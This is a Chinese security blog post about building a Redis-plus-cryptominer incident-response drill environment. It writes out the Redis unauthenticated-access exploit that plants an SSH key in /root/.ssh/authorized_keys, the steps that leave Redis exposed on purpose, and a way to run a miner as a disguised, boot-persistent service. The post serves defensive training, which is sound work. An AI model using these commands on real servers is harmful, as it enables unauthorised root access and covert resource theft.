关注我们

搭建Redis&Minerd安全应急演练环境

LzersLzers 安全文摘 2018-04-13 576454 0

近期公司需要进行一次安全运维应急演练,需要部署一套应急演练环境。想到几个月前公司的一台服务器的redis未认证授权漏洞导致被人放了挖矿程序,于是决定部署redis&minerd相结合的演练环境。

环境信息如下:

目标服务器:Centos 6 ;

目标IP:192.168.82.6;

首先需要安装redis,分别执行以下命令:

wget http://download.redis.io/releases/redis-3.2.5.tar.gztar xzf redis-3.2.5.tar.gzcd redis-3.2.5makemake install

顺利执行完成之后,运行:redis-server即可运行redis服务;启动redis服务时,读取配置文件redis.conf信息进行相应配置;而redis.conf的其中有两项默认配置项需要进行修改,以便能够利用redis未认证授权漏洞。

将bind 127.0.0.1 修改为:bind 0.0.0.0;这样才能从外部机器访问到该redis服务;另外,protected-mode需要修改为no,将redis服务的protected模式关闭,否则通过redis客户端无法正常访问redis服务。

接下来就需要利用redis未认证授权漏洞获取192.168.82.6这台机器的无密码登录权限,具体的利用步骤晚上已经有很详细的说明,这里就不再赘述。

在任意可连接192.168.82.6这台服务器的机器上,执行以下命令:

ssh-keygen -t rsa

(echo -e "\n\n"; cat/root/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt

cat foo.txt|redis-cli -h 192.168.82.6 -x setcrackit

redis-cli -h 192.168.82.6 config set dir/root/.ssh/

config get dir

config set dbfilename"authorized_keys"

save

完成上面的操作,就可以无密码登录192.168.82.6,效果如下:

搭建Redis&Minerd安全应急演练环境

接下来就是如何在目标服务器上运行挖矿程序了,正常运行挖矿程序,需要有一个矿池,即挖矿服务器,在BTCC、Antpool、F2pool上随意注册一个即可,注册成功之后即可使用它们提供的矿池来启动你的挖矿程序了。

搭建Redis&Minerd安全应急演练环境

搭建Redis&Minerd安全应急演练环境

我们可以将该服务名设置为与系统服务相似的名称,达到混淆的目的,增大该服务的发现难度,这里我简单命名为sysservice。接着在/etc/init.d/下创建一个sysservice同名的文件,因为sysservice作为服务启动、停止、重启都会调用这里的内容,文件内容如下:

搭建Redis&Minerd安全应急演练环境

还差最后一步,做到开机启动,需要在/etc/rc3.d目录中新建一个链接文件指向sysservice(ln -sf/etc/init.d/sysservice S22sysservice,其中22表示服务的优先级,数字越小,启动的优先级越高),因为该目录是系统启动时自动搜索的目录,该目录下的符号连接文件的目标文件都将被运行。这样即使目标服务器重启也能启动sysservice,从而启动挖矿程序,这样一个掩藏较深的安全应急演练环境就搭建好了。

所谓知己知彼,方能百战百胜,在搭建安全演练环境的过程中,正式与攻击者的一种博弈,充分了解漏洞产生和利用的场景,在处理安全事件的过程中也能得心应手。


版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢1评论已闭